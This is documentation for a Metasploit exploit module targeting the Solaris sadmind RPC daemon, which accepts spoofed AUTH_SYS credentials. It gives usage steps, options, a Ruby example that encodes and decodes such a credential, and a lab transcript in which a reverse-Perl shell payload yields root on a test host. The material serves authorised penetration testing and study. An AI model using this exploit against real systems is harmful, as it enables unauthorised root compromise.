GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/solaris/sunrpc/sadmind_exec.md
Vulnerable Application

This exploit targets a weakness in the default security settings of the Sun Solstice AdminSuite distributed system administration daemon (sadmind) RPC application. In its default configuration sadmind accepts AUTH_SYS (AUTH_UNIX) RPC credentials, in which the calling machine name, UID and GID are plain values asserted by the client with no secret behind them; a remote client that supplies the daemon's own hostname and claims UID 0 therefore has its requests executed as root. This server is installed and enabled by default on most versions of the Solaris operating system.

Vulnerable systems include Solaris 2.7, 8, and 9.

This module has been successfully tested on:

  • Solaris 8 02/00 (x86);

  • Solaris 8u1 06/00 (x86);

  • Solaris 8u2 10/00 (x86);

  • Solaris 8u3 01/01 (x86);

  • Solaris 8u4 04/01 (x86);

  • Solaris 9u2 12/02 (x86).

Verification Steps

  1. Start msfconsole

  2. Do: use exploit/solaris/sunrpc/sadmind_exec

  3. Do: set rhosts [rhost]

  4. Do: exploit

  5. You should get a new session as the root user.

Options

HOSTNAME

Remote hostname to place in the AUTH_SYS credential. By default the module detects it automatically; auto-detection fails if the system hostname was changed after the sadmind service was started, in which case set it explicitly.

GID

GID to emulate (default: 0)

UID

UID to emulate (default: 0)
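The three options above are exactly the fields of a SunRPC AUTH_SYS credential. The following Ruby is an added example, not code from the Metasploit module or from Rapid7: it encodes an RPC call carrying an AUTH_SYS (AUTH_UNIX) credential as laid out in RFC 5531 and RFC 4506, then parses it back the way a server would, to show that everything sadmind checks (machine name, UID, GID) is client-supplied and unverified. Nothing here touches the network. The XID, the sample hostname and the sadmind program version are assumed values chosen for the demonstration; the program number 100232 is the one rpcinfo lists for sadmind.

```ruby
# Added example (not the Metasploit module's code): build and decode a
# SunRPC CALL message with an AUTH_SYS credential, RFC 5531 / RFC 4506.
# Shows why sadmind's default authentication is weak: the machine name,
# UID and GID the server acts on are chosen by the client, and the
# verifier is AUTH_NULL, so there is nothing for the server to verify.

AUTH_NULL = 0
AUTH_SYS  = 1          # flavor 1, historically named AUTH_UNIX
RPC_CALL  = 0          # msg_type CALL
RPC_VERS  = 2
NULLPROC  = 0          # procedure 0 is defined for every RPC program
SADMIND_PROG = 100_232 # sadmind's program number as listed by rpcinfo -p
SADMIND_VERS = 10      # assumed version; confirm with rpcinfo on the target

# --- XDR encoding primitives: big-endian 32-bit words, 4-byte padding ---
def xdr_uint(n)
  [n].pack('N')
end

def xdr_opaque(bytes)
  pad = (4 - bytes.bytesize % 4) % 4
  xdr_uint(bytes.bytesize) + bytes.b + ("\0" * pad)
end

def xdr_uint_array(values)
  xdr_uint(values.size) + values.map { |v| xdr_uint(v) }.join
end

# AUTH_SYS body: stamp, machinename<255>, uid, gid, gids<16>.
# Every one of these fields is picked by the client.
def auth_sys_body(hostname:, uid:, gid:, gids: [], stamp: 0)
  xdr_uint(stamp) + xdr_opaque(hostname) + xdr_uint(uid) + xdr_uint(gid) +
    xdr_uint_array(gids)
end

# opaque_auth: flavor followed by the length-prefixed body.
def opaque_auth(flavor, body)
  xdr_uint(flavor) + xdr_opaque(body)
end

# RPC call header: xid, CALL, rpcvers 2, prog, vers, proc, cred, verf.
# With AUTH_SYS the verifier is AUTH_NULL (flavor 0, empty body).
def rpc_call(xid:, prog:, vers:, proc:, cred:)
  xdr_uint(xid) + xdr_uint(RPC_CALL) + xdr_uint(RPC_VERS) +
    xdr_uint(prog) + xdr_uint(vers) + xdr_uint(proc) +
    cred + opaque_auth(AUTH_NULL, '')
end

# A NULLPROC call to sadmind claiming the given identity (xid is assumed).
def sadmind_null_call(hostname:, uid: 0, gid: 0, xid: 0x1234)
  cred = opaque_auth(AUTH_SYS, auth_sys_body(hostname: hostname, uid: uid, gid: gid))
  rpc_call(xid: xid, prog: SADMIND_PROG, vers: SADMIND_VERS, proc: NULLPROC, cred: cred)
end

# --- Decoding: what a server relying on AUTH_SYS actually gets to check ---
class XdrReader
  def initialize(bytes)
    @buf = bytes.b
    @pos = 0
  end

  def uint
    raise 'short read' if @pos + 4 > @buf.bytesize
    v = @buf[@pos, 4].unpack1('N')
    @pos += 4
    v
  end

  def opaque
    len = uint
    raise 'short read' if @pos + len > @buf.bytesize
    v = @buf[@pos, len]
    @pos += len + (4 - len % 4) % 4   # skip the data and its padding
    v
  end

  def uint_array
    Array.new(uint) { uint }
  end
end

# Parse the header and the AUTH_SYS credential back out of a CALL message.
def parse_call(bytes)
  r = XdrReader.new(bytes)
  msg = { xid: r.uint, msg_type: r.uint, rpcvers: r.uint,
          prog: r.uint, vers: r.uint, proc: r.uint }
  flavor = r.uint
  raise "unexpected auth flavor #{flavor}" unless flavor == AUTH_SYS
  body = XdrReader.new(r.opaque)
  msg.merge(stamp: body.uint, hostname: body.opaque,
            uid: body.uint, gid: body.uint, gids: body.uint_array)
end

if $PROGRAM_NAME == __FILE__
  # The server-side view of a client that simply claims uid 0 on host "unknown".
  p parse_call(sadmind_null_call(hostname: 'unknown'))
end
```

Run it directly to see the decoded credential; note that the hostname, UID and GID come straight out of the bytes the client sent, which is the whole of what a level-1 sadmind has to go on. This is why the module's HOSTNAME, UID and GID options are all that is needed, and why the only real fix on the target is to disable sadmind or to require a stronger authentication flavor.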

Scenarios

Solaris 8u1 06/00 s28x_u1wos_08 INTEL (x86)

```
msf6 > use exploit/solaris/sunrpc/sadmind_exec
msf6 exploit(solaris/sunrpc/sadmind_exec) > set rhosts 192.168.200.148
rhosts => 192.168.200.148
msf6 exploit(solaris/sunrpc/sadmind_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf6 exploit(solaris/sunrpc/sadmind_exec) > run
[*] Started reverse TCP handler on 192.168.200.130:4444
[*] 192.168.200.148:111 - Attempting to determine hostname
[*] 192.168.200.148:111 - Found hostname: unknown
[*] 192.168.200.148:111 - Sending payload (234 bytes)
[+] 192.168.200.148:111 - Exploit did not give us an error, this is good.
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.148:32810) at 2025-04-21 01:38:08 -0400

id
uid=0(root) gid=0(root)
uname -a
SunOS unknown 5.8 Generic_108529-01 i86pc i386 i86pc
cat /etc/release
                        Solaris 8 6/00 s28x_u1wos_08 INTEL
           Copyright 2000 Sun Microsystems, Inc.  All Rights Reserved.
                             Assembled 28 April 2000
```